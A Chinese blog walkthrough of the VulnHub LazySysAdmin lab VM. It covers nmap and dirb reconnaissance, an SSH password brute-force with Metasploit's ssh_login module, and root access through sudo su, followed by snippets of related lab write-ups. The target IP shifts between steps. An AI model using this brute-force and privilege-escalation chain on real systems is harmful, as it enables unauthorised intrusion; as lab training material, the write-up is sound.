vulnhub-lazysysadmin-1靶机实战(代码片段)

火星上烤鱼 火星上烤鱼     2022-12-10     721

关键词:

第一章 信息收集

主机发现

nmap  192.168.202.0/24

在这里插入图片描述

扫描开发的端口

nmap 192.168.252.132 -p- 

在这里插入图片描述

扫描端口对应的服务

nmap -sV -T4 -p 80,445,3306,22,6667,139, 192.168.252.132

在这里插入图片描述

扫描存在的目录

dirb http://192.168.252.132

在这里插入图片描述
在这里插入图片描述

curl发现主机信息

使用curl获取目标web的banner信息,发现使用的中间件是apache2.4.7,目标系统为Ubuntu。

在这里插入图片描述

第二章ssh的破解

爆破ssh的信息

search ssh\\_login
use auxiliary/scanner/ssh/ssh\\_login
show option 
set rhost 192.168.2.63
set user\\_file /root/Desktop/user.txt
(user.txt文件下存放的是用户名)
set pass\\_file /root/Desktop/pass.txt
(pass.txt文件下存放的是密码)
exploit

在这里插入图片描述
在这里插入图片描述

ssh togie@192.168.2.63
whoami
pwd
id

在这里插入图片描述

第三章 提权

uname -a
ls -l /etc/passwd
sudo -l 列出用户权限或检查某个特定命令
groups 查看用户所在组
togie用户在本机上允许命令的权限为所有
togie用户所在组为:sudo

在这里插入图片描述

sudo su root
whoami
pwd

在这里插入图片描述

摘抄


世界是一面巨大的回音壁。
一个善良的灵魂,
照亮他人的同时,
总能收获不期而遇的温暖。
温柔对待这个世界的人,
也必将被世界温暖相拥。


靶机dc-4

靶机DC-4靶机下载地址:https://www.five86.com/dc-4.html扫描靶机所在网段,发现靶机为.133探测靶机端口服务等靶机开放8022端口访问下网站,需要用户名密码爆破下密码,用户名应该就是admin/Admin打开burp,随便输个密码,抓包可以将kali... 查看详情

靶机渗透lazysysadmin(代码片段)

文章目录*一.lazysysadmin靶机安装*1.下载靶机2.打开靶机*二.lazysysadmin靶机渗透*1.信息收集2.Web渗透3.共享服务4.ssh服务5.文件上传一.lazysysadmin靶机安装1.下载靶机百度网盘链接提取码lazysysadmin.zip提取码:m02v2.打开靶机打开VMware... 查看详情

vulnhub靶机-moriartycorp

靶机:MoriartyCorp靶机下载地址:https://www.vulnhub.com/entry/boredhackerblog-moriarty-corp,456/靶机公网IP:192.168.3.65(该靶机用docker搭建了内网)kali机IP:192.168.3.62真机IP 查看详情

vulnhub靶机-doubletrouble

靶机下载地址:https://www.vulnhub.com/entry/doubletrouble-1,743/靶机环境:桥接模式(最好搭建在virtualbox中),由于该靶机网卡的原因,如果是nat模式会扫不到,若使用nat则需修改kali网卡为与靶机一样的网卡kali机IP:192.16 查看详情

靶机渗透hackme:1(代码片段)

【靶机渗透】HACKME:1本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME:1文章目录【靶机渗透】HACKME:10x01靶机介绍1.详情2.描述0x02环境搭建1.下载靶机2.创建靶机3.开启靶机0x03靶机渗透1.主机发现2.端口扫描3.服务扫描4.web... 查看详情

vulnhub靶机渗透测试实战:入门dc-1靶机完全渗透

菜鸡的第一篇学习分享——Vulnhub靶机渗透测试实战(一):入门DC-1靶机完全渗透关于Vulnhub:Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。https://www.vulnhub.com/根据Vulnhub的要求... 查看详情

meandmygirfrend靶机

使用kali作为 查看详情

dc-2靶机

配置好vmbox网络环境,运行DC2靶机打开kali,改用桥接模式。可以ping通物理机,可以上网。用nmap扫描存活主机nmap-sP192.168.123.0/24 可以看到有DC-2,DC-3(这是我另外开的,暂时不用管)DC-2靶机ip:192.168.123.57 得到了靶机ip,... 查看详情

靶机渗透测试-lazysysadmin(代码片段)

...登入的时间日志历史记录总结实验环境准备下载Lazysysadmin靶机,利用kali当攻击方下载完靶机后利用VMare快捷键,ctrlo打开导入即可信息收集ifconifg获取自己靶机地址,nampsn扫描网段中的靶机进行快速端口扫描还有ssh服务都可以利用登... 查看详情

vulnhub-dc-5靶机实战

前言靶机下载地址:https://www.vulnhub.com/entry/dc-5,314/KALI地址:192.168.16.109靶机地址:192.168.16.1一.信息收集1.主机发现使用如下命令来发现靶机netdiscover-r192.168.16.109如下图发 查看详情

靶机渗透blogger:1(代码片段)

【靶机渗透】BLOGGER:10x01靶机介绍1.详情链接:https://www.vulnhub.com/entry/blogger-1,675/2.描述JamesMBrunner,AWebDeveloperhasrecentlycreatedablogwebsite.HehiredyoutotesttheSecurityofhisBlogWebsite.HackYourWayInMr.Robo 查看详情

vulnhub-dc-6靶机实战(nmap提权)

前言靶机下载地址:https://www.vulnhub.com/entry/dc-6,315/KALI地址:192.168.16.108靶机地址:192.168.16.3如下图,是靶机介绍,可能有暴力破解的地方一.信息收集1.主机发现使用下面的命令来发现靶机netdiscover 查看详情

dc-1靶机的渗透学习(代码片段)

一、靶机的环境搭配  攻击机(KALI):192.168.226.129   靶机(DC-1):  192.168.226.131(未知)   靶机地址:https://www.vulnhub.com/entry/dc-1,292/二、战前准备 要求:攻击机和靶机在同一网段下,使用NAT模式   1、找到kali的IP地址&#x... 查看详情

靶机渗透hackme-1(详解,适合新手)(代码片段)

靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、信息收集二、漏洞挖掘SQL注入文件上传漏洞三、漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、提权0x04实验总结0x01靶机... 查看详情

靶机dc-8(详细渗透,适合新手渗透)(代码片段)

目录靶机DC-8(详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1.下载并导入靶机2.查看网络适配器3.启动靶机0x03靶机渗透一、信息收集1.主机发现2.端口扫描3.详细扫描4.目录扫描5.gobuster目录扫描6.网站指纹识别二、... 查看详情

vulnhub-tomato靶机实战

前言靶机下载地址:https://www.vulnhub.com/entry/tomato-1,557/KALI地址:192.168.94.108靶机地址:192.168.94.30一.信息收集1.主机发现使用命令如下,进行发现主机netdiscover-r192.168.94.3 查看详情

vulnhub靶机-cybersploit:2渗透笔记(代码片段)

...f09;2.4目录爆破3.漏洞利用3.1ssh登录4.提权5.总结1.环境搭建靶机环境搭建攻击渗透机:kaliIP地址:192.168.33.139靶机:CyberSploit:2IP地址未知靶机下载地址:https://www.vu 查看详情

靶机渗透blogger:1(代码片段)

【靶机渗透】BLOGGER:10x01靶机介绍1.详情链接:https://www.vulnhub.com/entry/blogger-1,675/2.描述JamesMBrunner,AWebDeveloperhasrecentlycreatedablogwebsite.HehiredyoutotesttheSecurityofhisBlogWebsite.HackYourWayInMr.RobotStyle😃一位Web开发人员JamesMBrunner最近创建了一... 查看详情